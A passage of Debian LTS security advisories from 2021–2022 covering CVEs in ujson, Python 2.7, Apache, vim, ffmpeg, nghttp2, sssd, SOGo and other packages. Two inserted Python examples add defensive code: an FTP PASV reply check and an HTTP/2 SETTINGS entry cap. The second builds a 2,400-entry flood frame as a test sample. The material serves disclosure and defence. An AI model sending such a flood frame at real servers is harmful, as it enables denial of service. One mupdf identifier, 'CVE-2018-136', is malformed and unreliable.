We recommend that you upgrade your gif2apng packages.

For the detailed security status of gif2apng please refer to its security tracker page at: https://security-tracker.debian.org/tracker/gif2apng
[SECURITY] [DLA 2929-1] ujson security update
Debian LTS Advisory DLA-2929-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
February 26, 2022                             https://wiki.debian.org/LTS

Package        : ujson
Version        : 1.35-1+deb9u1
CVE ID         : CVE-2021-45958

One issue has been discovered in ujson, an ultra fast JSON encoder and decoder for Python.

CVE-2021-45958

    Stack-based buffer overflow in Buffer_AppendIndentUnchecked (called from encode) has been detected. Exploitation can, for example, use a large amount of indentation.

For Debian 9 stretch, this problem has been fixed in version 1.35-1+deb9u1.

We recommend that you upgrade your ujson packages.

For the detailed security status of ujson please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ujson
[SECURITY] [DLA 2919-1] python2.7 security update
Debian LTS Advisory DLA-2919-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
February 12, 2022                             https://wiki.debian.org/LTS

Package        : python2.7
Version        : 2.7.13-2+deb9u6
CVE ID         : CVE-2021-3177 CVE-2021-4189

Two issues have been discovered in python2.7:

CVE-2021-3177

    Python has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input.

CVE-2021-4189

    A flaw was found in Python, specifically in the FTP (File Transfer Protocol) client library when using it in PASV (passive) mode. The flaw lies in how the FTP client trusts the host from the PASV response by default. An attacker could use this flaw to set up a malicious FTP server that can trick FTP clients into connecting back to a given IP address and port. This could lead to the FTP client scanning ports which otherwise would not have been possible.

    Instead of using the returned address, ftplib now uses the IP address we're already connected to. For the rare user who wants the old behavior, set a `trust_server_pasv_ipv4_address` attribute on your `ftplib.FTP` instance to True.

For Debian 9 stretch, these problems have been fixed in version 2.7.13-2+deb9u6.

We recommend that you upgrade your python2.7 packages.

For the detailed security status of python2.7 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/python2.7
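The PASV handling change described for CVE-2021-4189, as an added example that is not part of the advisory or of CPython's ftplib: a small parser for the FTP "227" reply that applies the same rule (the data connection goes to the host the control connection is already on, unless the caller opts in, mirroring the trust_server_pasv_ipv4_address attribute), plus a check a client can log when a server advertises a different address. Function names and the sample reply are assumptions constructed for this example.

```python
import re

# Matches the six comma-separated numbers in a
# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply (RFC 959 PASV).
_PASV_RE = re.compile(r"(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)")


def parse_pasv_reply(reply, connected_host, trust_server_pasv_ipv4_address=False):
    """Return (host, port, advertised_host) for a PASV reply.

    Applies the rule the advisory describes for CVE-2021-4189: the host the
    server advertises is ignored and the host the control connection already
    uses is taken for the data connection, unless the caller explicitly opts
    in (the same switch ftplib exposes as trust_server_pasv_ipv4_address).
    """
    if not reply.startswith("227"):
        raise ValueError("unexpected reply to PASV: %r" % reply)
    match = _PASV_RE.search(reply)
    if match is None:
        raise ValueError("malformed PASV reply: %r" % reply)
    fields = [int(x) for x in match.groups()]
    if any(f > 255 for f in fields):
        raise ValueError("PASV reply field out of range: %r" % reply)
    advertised_host = "%d.%d.%d.%d" % tuple(fields[:4])
    port = (fields[4] << 8) + fields[5]
    host = advertised_host if trust_server_pasv_ipv4_address else connected_host
    return host, port, advertised_host


def pasv_redirect_warning(reply, connected_host):
    """Return a log-worthy message if the server tried to send the data
    connection to a host other than the one we connected to, else None."""
    _, port, advertised = parse_pasv_reply(reply, connected_host)
    if advertised == connected_host:
        return None
    return ("PASV reply advertised %s:%d but control connection is to %s; "
            "ignoring advertised host" % (advertised, port, connected_host))


if __name__ == "__main__":
    # Constructed sample: control connection to 203.0.113.7 (documentation
    # range), server advertises an unrelated internal address in its reply.
    sample = "227 Entering Passive Mode (10,0,0,5,4,1)."
    print(parse_pasv_reply(sample, "203.0.113.7"))
    print(pasv_redirect_warning(sample, "203.0.113.7"))
```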
[SECURITY] [DLA 2907-1] apache2 security update
Debian LTS Advisory DLA-2907-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
February 01, 2022                             https://wiki.debian.org/LTS

Package        : apache2
Version        : 2.4.25-3+deb9u12
CVE ID         : CVE-2021-44224 CVE-2021-44790

Two vulnerabilities have been discovered in the Apache HTTP server:

CVE-2021-44224

    When operating as a forward proxy, Apache was, depending on the setup, susceptible to denial of service or Server Side Request Forgery.

CVE-2021-44790

    A buffer overflow in mod_lua may result in denial of service or potentially the execution of arbitrary code.

For Debian 9 stretch, these problems have been fixed in version 2.4.25-3+deb9u12.

We recommend that you upgrade your apache2 packages.

For the detailed security status of apache2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/apache2
[SECURITY] [DLA 2879-1] lighttpd security update
Debian LTS Advisory DLA-2879-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
January 14, 2022                              https://wiki.debian.org/LTS

Package        : lighttpd
Version        : 1.4.45-1+deb9u1
CVE ID         : CVE-2018-19052

One issue has been discovered in lighttpd, a fast webserver with minimal memory footprint.

CVE-2018-19052

    An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.

For Debian 9 stretch, this problem has been fixed in version 1.4.45-1+deb9u1.

We recommend that you upgrade your lighttpd packages.

For the detailed security status of lighttpd please refer to its security tracker page at: https://security-tracker.debian.org/tracker/lighttpd
[SECURITY] [DLA 2876-1] vim security update
Debian LTS Advisory DLA-2876-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
January 10, 2022                              https://wiki.debian.org/LTS

Package        : vim
Version        : 2:8.0.0197-4+deb9u4
CVE ID         : CVE-2017-17087 CVE-2019-20807 CVE-2021-3778 CVE-2021-3796

Multiple issues have been discovered in vim, an enhanced vi text editor:

CVE-2017-17087

    fileio.c in Vim sets the group ownership of a .swp file to the editor's primary group (which may be different from the group ownership of the original file), which allows local users to obtain sensitive information by leveraging an applicable group membership.

CVE-2019-20807

    Users can circumvent the rvim restricted mode and execute arbitrary OS commands via scripting interfaces (e.g., Python, Ruby, or Lua).

CVE-2021-3778

    Heap-based buffer overflow with an invalid UTF-8 character was detected in regexp_nfa.c.

CVE-2021-3796

    Heap use-after-free memory error was detected in normal.c. A successful exploitation may lead to code execution.

For Debian 9 stretch, these problems have been fixed in version 2:8.0.0197-4+deb9u4.

We recommend that you upgrade your vim packages.

For the detailed security status of vim please refer to its security tracker page at: https://security-tracker.debian.org/tracker/vim
[SECURITY] [DLA 2848-1] libssh2 security update
Debian LTS Advisory DLA-2848-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
December 17, 2021                             https://wiki.debian.org/LTS

Package        : libssh2
Version        : 1.7.0-1+deb9u2
CVE ID         : CVE-2019-13115 CVE-2019-17498

Two issues have been discovered in libssh2, a client-side C library implementing the SSH2 protocol:

CVE-2019-13115

    kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises an SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server.

CVE-2019-17498

    SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server.

For Debian 9 stretch, these problems have been fixed in version 1.7.0-1+deb9u2.

We recommend that you upgrade your libssh2 packages.

For the detailed security status of libssh2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libssh2
[SECURITY] [DLA 2839-1] gerbv security update
Debian LTS Advisory DLA-2839-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
December 03, 2021                             https://wiki.debian.org/LTS

Package        : gerbv
Version        : 2.6.1-2+deb9u1
CVE ID         : CVE-2021-40391

One security issue has been discovered in gerbv, a viewer for Gerber RS-274X files.

It was discovered that an out-of-bounds write vulnerability exists in the drill format T-code tool. A specially-crafted drill file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

For Debian 9 stretch, this problem has been fixed in version 2.6.1-2+deb9u1.

We recommend that you upgrade your gerbv packages.

For the detailed security status of gerbv please refer to its security tracker page at: https://security-tracker.debian.org/tracker/gerbv
[SECURITY] [DLA 2837-1] gmp security update
Debian LTS Advisory DLA-2837-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
December 02, 2021                             https://wiki.debian.org/LTS

Package        : gmp
Version        : 2:6.1.2+dfsg-1+deb9u1
CVE ID         : CVE-2021-43618
Debian Bug     : 994405

One security issue has been discovered in gmp, the GNU Multiple Precision Arithmetic Library.

It was discovered that an integer overflow is possible in mpz/inp_raw.c, with a resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.

For Debian 9 stretch, this problem has been fixed in version 2:6.1.2+dfsg-1+deb9u1.

We recommend that you upgrade your gmp packages.

For the detailed security status of gmp please refer to its security tracker page at: https://security-tracker.debian.org/tracker/gmp
[SECURITY] [DLA 2818-1] ffmpeg security update
Debian LTS Advisory DLA-2818-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
November 13, 2021                             https://wiki.debian.org/LTS

Package        : ffmpeg
Version        : 7:3.2.16-1+deb9u1
CVE ID         : CVE-2020-20445 CVE-2020-20446 CVE-2020-20451 CVE-2020-20453
                 CVE-2020-22037 CVE-2020-22041 CVE-2020-22044 CVE-2020-22046
                 CVE-2020-22048 CVE-2020-22049 CVE-2020-22054 CVE-2021-38171
                 CVE-2021-38291

Multiple issues have been discovered in ffmpeg, tools for transcoding, streaming and playing of multimedia files.

CVE-2020-20445

    Divide By Zero issue via libavcodec/lpc.h, which allows a remote malicious user to cause a Denial of Service.

CVE-2020-20446

    Divide By Zero issue via libavcodec/aacpsy.c, which allows a remote malicious user to cause a Denial of Service.

CVE-2020-20451

    Denial of Service issue due to resource management errors via fftools/cmdutils.c.

CVE-2020-20453

    Divide By Zero issue via libavcodec/aaccoder, which allows a remote malicious user to cause a Denial of Service.

CVE-2020-22037

    A Denial of Service vulnerability due to a memory leak in avcodec_alloc_context3 at options.c.

CVE-2020-22041

    A Denial of Service vulnerability due to a memory leak in the av_buffersrc_add_frame_flags function in buffersrc.

CVE-2020-22044

    A Denial of Service vulnerability due to a memory leak in the url_open_dyn_buf_internal function in libavformat/aviobuf.c.

CVE-2020-22046

    A Denial of Service vulnerability due to a memory leak in the avpriv_float_dsp_allocl function in libavutil/float_dsp.c.

CVE-2020-22048

    A Denial of Service vulnerability due to a memory leak in the ff_frame_pool_get function in framepool.c.

CVE-2020-22049

    A Denial of Service vulnerability due to a memory leak in the wtvfile_open_sector function in wtvdec.c.

CVE-2020-22054

    A Denial of Service vulnerability due to a memory leak in the av_dict_set function in dict.c.

CVE-2021-38171

    adts_decode_extradata in libavformat/adtsenc.c does not check the init_get_bits return value, which is a necessary step because the second argument to init_get_bits can be crafted.

CVE-2021-38291

    Assertion failure at src/libavutil/mathematics.c, causing ffmpeg to abort, is detected. In some extreme cases, like with adpcm_ms samples with an extremely high channel count, get_audio_frame_duration() may return a negative frame duration value.

For Debian 9 stretch, these problems have been fixed in version 7:3.2.16-1+deb9u1.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ffmpeg
[SECURITY] [DLA 2812-1] botan1.10 security update
Debian LTS Advisory DLA-2812-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
November 08, 2021                             https://wiki.debian.org/LTS

Package        : botan1.10
Version        : 1.10.17-1+deb9u1
CVE ID         : CVE-2017-14737

One security issue has been discovered in botan1.10, a C++ cryptography library.

A local or cross-VM attacker may be able to recover bits of secret exponents as used in RSA, DH, etc. with the help of cache analysis.

https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/wang-shuai

For Debian 9 stretch, this problem has been fixed in version 1.10.17-1+deb9u1.

We recommend that you upgrade your botan1.10 packages.

For the detailed security status of botan1.10 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/botan1.10
[SECURITY] [DLA 2793-1] mosquitto security update

Debian LTS Advisory DLA-2793-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
October 26, 2021                                 https://wiki.debian.org/LTS

Package        : mosquitto
Version        : 1.4.10-3+deb9u5
CVE ID         : CVE-2017-7655

One security issue has been discovered in mosquitto, an MQTT message
broker. A NULL pointer dereference vulnerability was found which could
lead to crashes for applications using the library.

For Debian 9 stretch, this problem has been fixed in version
1.4.10-3+deb9u5.

We recommend that you upgrade your mosquitto packages.

For the detailed security status of mosquitto please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/mosquitto

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2786-1] nghttp2 security update

Debian LTS Advisory DLA-2786-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
October 16, 2021                                 https://wiki.debian.org/LTS

Package        : nghttp2
Version        : 1.18.1-1+deb9u2
CVE ID         : CVE-2018-1000168 CVE-2020-11080

Two security issues have been discovered in nghttp2, a server, proxy and
client implementing HTTP/2.

CVE-2018-1000168

    An Improper Input Validation (CWE-20) vulnerability was found in
    ALTSVC frame handling that can result in a segmentation fault
    leading to denial of service. This attack appears to be exploitable
    via a network client.

CVE-2020-11080

    An overly large HTTP/2 SETTINGS frame payload causes denial of
    service. The proof of concept attack involves a malicious client
    constructing a SETTINGS frame with a length of 14,400 bytes (2400
    individual settings entries) over and over again. The attack causes
    the CPU to spike at 100%.

For Debian 9 stretch, these problems have been fixed in version
1.18.1-1+deb9u2.

We recommend that you upgrade your nghttp2 packages.

For the detailed security status of nghttp2 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/nghttp2

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
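An added example, not part of the advisory or of nghttp2's own code: a minimal HTTP/2 SETTINGS frame parser (RFC 7540 frame layout, 6 bytes per settings entry) that rejects any frame carrying more entries than a fixed cap. The cap is the mitigation upstream nghttp2 applied for CVE-2020-11080 (nghttp2_option_set_max_settings(), default 32); the constant names, the helper functions and the constructed 2400-entry frame below are this example's own.

```python
"""Parse HTTP/2 SETTINGS frames and enforce a per-frame entry cap (CVE-2020-11080)."""
import struct

FRAME_HEADER_LEN = 9          # 24-bit length, 8-bit type, 8-bit flags, 32-bit stream id
FRAME_TYPE_SETTINGS = 0x4
FLAG_ACK = 0x1
SETTINGS_ENTRY_LEN = 6        # 16-bit identifier + 32-bit value
DEFAULT_MAX_SETTINGS = 32     # same default nghttp2 1.41.0 adopted for its cap


class FrameError(Exception):
    """Raised when a frame violates the protocol or a local resource limit."""


def parse_frame_header(data: bytes):
    """Return (length, type, flags, stream_id) from the 9-byte frame header."""
    if len(data) < FRAME_HEADER_LEN:
        raise FrameError("short frame header")
    length = int.from_bytes(data[0:3], "big")
    ftype = data[3]
    flags = data[4]
    stream_id = struct.unpack(">I", data[5:9])[0] & 0x7FFFFFFF  # drop reserved bit
    return length, ftype, flags, stream_id


def parse_settings_frame(data: bytes, max_settings: int = DEFAULT_MAX_SETTINGS):
    """Validate a SETTINGS frame and return its entries as (identifier, value) tuples.

    The entry count is checked *before* any per-entry work, so a 14,400-byte
    frame (2400 entries) is refused after reading only the 9-byte header.
    """
    length, ftype, flags, stream_id = parse_frame_header(data)
    if ftype != FRAME_TYPE_SETTINGS:
        raise FrameError(f"not a SETTINGS frame (type 0x{ftype:x})")
    if stream_id != 0:
        raise FrameError("SETTINGS frames must be sent on stream 0")
    if flags & FLAG_ACK and length != 0:
        raise FrameError("SETTINGS ACK must carry an empty payload")
    if length % SETTINGS_ENTRY_LEN != 0:
        raise FrameError("SETTINGS payload length is not a multiple of 6")
    entries = length // SETTINGS_ENTRY_LEN
    if entries > max_settings:
        # Local limit, not a protocol rule: bounds the CPU spent per frame.
        raise FrameError(f"{entries} settings entries exceed the cap of {max_settings}")
    payload = data[FRAME_HEADER_LEN:FRAME_HEADER_LEN + length]
    if len(payload) != length:
        raise FrameError("truncated SETTINGS payload")
    return [struct.unpack(">HI", payload[i:i + SETTINGS_ENTRY_LEN])
            for i in range(0, length, SETTINGS_ENTRY_LEN)]


def accepts(data: bytes, max_settings: int = DEFAULT_MAX_SETTINGS) -> bool:
    """True if the frame passes validation, False if it would be rejected."""
    try:
        parse_settings_frame(data, max_settings)
        return True
    except FrameError:
        return False


def build_settings_frame(entries) -> bytes:
    """Encode (identifier, value) pairs as a SETTINGS frame on stream 0 (test helper)."""
    payload = b"".join(struct.pack(">HI", ident, value) for ident, value in entries)
    header = (len(payload).to_bytes(3, "big")
              + bytes([FRAME_TYPE_SETTINGS, 0])
              + (0).to_bytes(4, "big"))
    return header + payload


if __name__ == "__main__":
    # Constructed samples: an ordinary client SETTINGS frame and the
    # 14,400-byte frame size quoted in the advisory.
    normal = build_settings_frame([(0x3, 100), (0x4, 65535)])
    flood = build_settings_frame([(0x1, 4096)] * 2400)
    print(parse_settings_frame(normal))
    print("normal accepted:", accepts(normal), "| flood accepted:", accepts(flood))
```

The cap bounds the work per frame; the "over and over again" part of the advisory still needs a per-connection rate limit on control frames, which is a separate check.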
[SECURITY] [DLA 2775-1] plib security update

Debian LTS Advisory DLA-2775-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
October 02, 2021                                 https://wiki.debian.org/LTS

Package        : plib
Version        : 1.8.5-7+deb9u1
CVE ID         : CVE-2021-38714

One security issue has been discovered in plib: an integer overflow
vulnerability that could result in arbitrary code execution. The
vulnerability is found in the ssgLoadTGA() function in the
src/ssg/ssgLoadTGA.cxx file.

For Debian 9 stretch, this problem has been fixed in version
1.8.5-7+deb9u1.

We recommend that you upgrade your plib packages.

For the detailed security status of plib please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/plib

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2765-1] mupdf security update

Debian LTS Advisory DLA-2765-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
September 23, 2021                               https://wiki.debian.org/LTS

Package        : mupdf
Version        : 1.14.0+ds1-4+deb9u1
CVE ID         : CVE-2016-10246 CVE-2016-10247 CVE-2017-6060 CVE-2018-10289
                 CVE-2018-136 CVE-2020-19609

Multiple issues have been discovered in mupdf.

CVE-2016-10246

    Buffer overflow in the main function in jstest_main.c allows remote
    attackers to cause a denial of service (out-of-bounds write) via a
    crafted file.

CVE-2016-10247

    Buffer overflow in the my_getline function in jstest_main.c allows
    remote attackers to cause a denial of service (out-of-bounds write)
    via a crafted file.

CVE-2017-6060

    Stack-based buffer overflow in jstest_main.c allows remote attackers
    to have unspecified impact via a crafted image.

CVE-2018-10289

    An infinite loop in the fz_skip_space function of the
    pdf/pdf-xref.c file. A remote adversary could leverage this
    vulnerability to cause a denial of service via a crafted PDF file.

CVE-2018-136

    Multiple memory leaks in the PDF parser allow an attacker to cause a
    denial of service (memory leak) via a crafted file.

CVE-2020-19609

    A heap-based buffer over-write in the tiff_expand_colormap()
    function when parsing TIFF files, allowing attackers to cause a
    denial of service.

For Debian 9 stretch, these problems have been fixed in version
1.14.0+ds1-4+deb9u1.

We recommend that you upgrade your mupdf packages.

For the detailed security status of mupdf please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/mupdf

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2758-1] sssd security update

Debian LTS Advisory DLA-2758-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
September 15, 2021                               https://wiki.debian.org/LTS

Package        : sssd
Version        : 1.15.0-3+deb9u2
CVE ID         : CVE-2021-3621

One security issue has been discovered in sssd. The sssctl command was
vulnerable to shell command injection via the logs-fetch and
cache-expire subcommands. This flaw allows an attacker to trick the root
user into running a specially crafted sssctl command, such as via sudo,
to gain root access. The highest threat from this vulnerability is to
confidentiality, integrity, as well as system availability.

For Debian 9 stretch, this problem has been fixed in version
1.15.0-3+deb9u2.

We recommend that you upgrade your sssd packages.

For the detailed security status of sssd please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/sssd

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2742-2] ffmpeg regression update

Debian LTS Advisory DLA-2742-2                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
August 22, 2021                                  https://wiki.debian.org/LTS

Package        : ffmpeg
Version        : 7:3.2.15-0+deb9u4

During the backporting of one of the patches for CVE-2020-22021, one line
was wrongly interpreted, which caused a regression during the
deinterlacing process.

Thanks to Jari Ruusu for reporting the issue and for testing the
prepared update.

For Debian 9 stretch, this problem has been fixed in version
7:3.2.15-0+deb9u4.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/ffmpeg

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2742-1] ffmpeg security update

Debian LTS Advisory DLA-2742-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
August 14, 2021                                  https://wiki.debian.org/LTS

Package        : ffmpeg
Version        : 7:3.2.15-0+deb9u3
CVE ID         : CVE-2020-21041 CVE-2020-22015 CVE-2020-22016 CVE-2020-22020
                 CVE-2020-22021 CVE-2020-22022 CVE-2020-22023 CVE-2020-22025
                 CVE-2020-22026 CVE-2020-22028 CVE-2020-22031 CVE-2020-22032
                 CVE-2020-22036 CVE-2021-3566 CVE-2021-38114

Multiple issues have been discovered in ffmpeg.

CVE-2020-21041

    Buffer overflow vulnerability via apng_do_inverse_blend in
    libavcodec/pngenc.c, which could let a remote malicious user cause
    a denial of service.

CVE-2020-22015

    Buffer overflow vulnerability in mov_write_video_tag due to an
    out-of-bounds access in libavformat/movenc.c, which could let a
    remote malicious user obtain sensitive information, cause a denial
    of service, or execute arbitrary code.

CVE-2020-22016

    A heap-based buffer overflow vulnerability at libavcodec/get_bits.h
    when writing .mov files, which might lead to memory corruption and
    other potential consequences.

CVE-2020-22020

    Buffer overflow vulnerability in the build_diff_map function in
    libavfilter/vf_fieldmatch.c, which could let a remote malicious user
    cause a denial of service.

CVE-2020-22021

    Buffer overflow vulnerability in the filter_edges function in
    libavfilter/vf_yadif.c, which could let a remote malicious user
    cause a denial of service.

CVE-2020-22022

    A heap-based buffer overflow vulnerability in filter_frame at
    libavfilter/vf_fieldorder.c, which might lead to memory corruption
    and other potential consequences.

CVE-2020-22023

    A heap-based buffer overflow vulnerability in filter_frame at
    libavfilter/vf_bitplanenoise.c, which might lead to memory
    corruption and other potential consequences.

CVE-2020-22025

    A heap-based buffer overflow vulnerability in gaussian_blur at
    libavfilter/vf_edgedetect.c, which might lead to memory corruption
    and other potential consequences.

CVE-2020-22026

    Buffer overflow vulnerability in the config_input function at
    libavfilter/af_tremolo.c, which could let a remote malicious user
    cause a denial of service.

CVE-2020-22028

    Buffer overflow vulnerability in filter_vertically_8 at
    libavfilter/vf_avgblur.c, which could cause a remote denial of
    service.

CVE-2020-22031

    A heap-based buffer overflow vulnerability in filter16_complex_low,
    which might lead to memory corruption and other potential
    consequences.

CVE-2020-22032

    A heap-based buffer overflow vulnerability in gaussian_blur, which
    might lead to memory corruption and other potential consequences.

CVE-2020-22036

    A heap-based buffer overflow vulnerability in filter_intra at
    libavfilter/vf_bwdif.c, which might lead to memory corruption and
    other potential consequences.

CVE-2021-3566

    The tty demuxer did not have a 'read_probe' function assigned to it.
    By crafting a legitimate "ffconcat" file that references an image,
    followed by a file that triggers the tty demuxer, the contents of
    the second file will be copied into the output file verbatim (as
    long as the `-vcodec copy` option is passed to ffmpeg).

CVE-2021-38114

    libavcodec/dnxhddec.c does not check the return value of the
    init_vlc function. Crafted DNxHD data can cause unspecified impact.

For Debian 9 stretch, these problems have been fixed in version
7:3.2.15-0+deb9u3.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/ffmpeg

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2707-1] sogo security update

Debian LTS Advisory DLA-2707-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
July 12, 2021                                    https://wiki.debian.org/LTS

Package        : sogo
Version        : 3.2.6-2+deb9u1
CVE ID         : CVE-2021-33054

One security issue has been discovered in sogo. SOGo does not validate
the signatures of any SAML assertions it receives. Any actor with
network access to the deployment could impersonate users when SAML is
the authentication method.

For Debian 9 stretch, this problem has been fixed in version
3.2.6-2+deb9u1.

We recommend that you upgrade your sogo packages.

ATTENTION! If you are using SAML authentication, use sogo-tool to
immediately delete user sessions and force all users to visit the
login page:

    sogo-tool -v expire-sessions 1
    systemctl restart memcached

For the detailed security status of sogo please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/sogo

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2705-1] scilab security update

Debian LTS Advisory DLA-2705-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
July 07, 2021                                    https://wiki.debian.org/LTS

Package        : scilab
Version        : 5.5.2-4+deb9u1
CVE ID         : CVE-2021-30485 CVE-2021-31229 CVE-2021-31347 CVE-2021-31348
                 CVE-2021-31598

Multiple issues have been discovered in scilab, particularly in the
embedded ezXML library:

CVE-2021-30485

    Incorrect memory handling, leading to a NULL pointer dereference in
    ezxml_internal_dtd().

CVE-2021-31229

    Out-of-bounds write in ezxml_internal_dtd() leading to an
    out-of-bounds write of a one-byte constant.

CVE-2021-31347, CVE-2021-31348

    Incorrect memory handling in ezxml_parse_str() leading to an
    out-of-bounds read.

CVE-2021-31598

    Out-of-bounds write in ezxml_decode() leading to heap corruption.

For Debian 9 stretch, these problems have been fixed in version
5.5.2-4+deb9u1.

We recommend that you upgrade your scilab packages.

For the detailed security status of scilab please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/scilab

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2687-2] prosody regression update

Debian LTS Advisory DLA-2687-2                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
June 19, 2021                                    https://wiki.debian.org/LTS

Package        : prosody
Version        : 0.9.12-2+deb9u4
CVE ID         : CVE-2021-32921

It was discovered that the previous upload of the prosody package,
version 0.9.12-2+deb9u3, introduced a regression in the
mod_auth_internal_hashed module.

Big thanks to Andre Bianchi for reporting the issue and for testing the
update.

For Debian 9 stretch, this problem has been fixed in version
0.9.12-2+deb9u4.

We recommend that you upgrade your prosody packages.

For the detailed security status of prosody please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/prosody

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2687-1] prosody security update

Debian LTS Advisory DLA-2687-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
June 15, 2021                                    https://wiki.debian.org/LTS

Package        : prosody
Version        : 0.9.12-2+deb9u3
CVE ID         : CVE-2021-32917 CVE-2021-32921

Two security issues have been discovered in prosody:

CVE-2021-32917

    The proxy65 component allows open access by default, even if
    neither of the users has an XMPP account on the local server,
    allowing unrestricted use of the server's bandwidth.

CVE-2021-32921

    The authentication module does not use a constant-time algorithm
    for comparing certain secret strings when running under Lua 5.2 or
    later. This can potentially be used in a timing attack to reveal
    the contents of secret strings to an attacker.

For Debian 9 stretch, these problems have been fixed in version
0.9.12-2+deb9u3.

We recommend that you upgrade your prosody packages.

For the detailed security status of prosody please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/prosody

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2677-1] libwebp security update

Debian LTS Advisory DLA-2677-1                  debian-...@lists.debian.org
https://www.debian.org/lts/security/                           Anton Gladky
June 05, 2021                                    https://wiki.debian.org/LTS

Package        : libwebp
Version        : 0.5.2-1+deb9u1
CVE ID         : CVE-2018-25009 CVE-2018-25010 CVE-2018-25011 CVE-2018-25012
                 CVE-2018-25013 CVE-2018-25014 CVE-2020-36328 CVE-2020-36329
                 CVE-2020-36330 CVE-2020-36331

Multiple security issues have been discovered in libwebp.

CVE-2018-25009

    An out-of-bounds read was found in function WebPMuxCreateInternal.
    The highest threat from this vulnerability is to data
    confidentiality and to the service availability.

CVE-2018-25010

    An out-of-bounds read was found in function ApplyFilter. The
    highest threat from this vulnerability is to data confidentiality
    and to the service availability.

CVE-2018-25011

    A heap-based buffer overflow was found in PutLE16(). The highest
    threat from this vulnerability is to data confidentiality and
    integrity as well as system availability.

CVE-2018-25012

    An out-of-bounds read was found in function WebPMuxCreateInternal.
    The highest threat from this vulnerability is to data
    confidentiality and to the service availability.

CVE-2018-25013

    An out-of-bounds read was found in function ShiftBytes. The highest
    threat from this vulnerability is to data confidentiality and to
    the service availability.

CVE-2018-25014

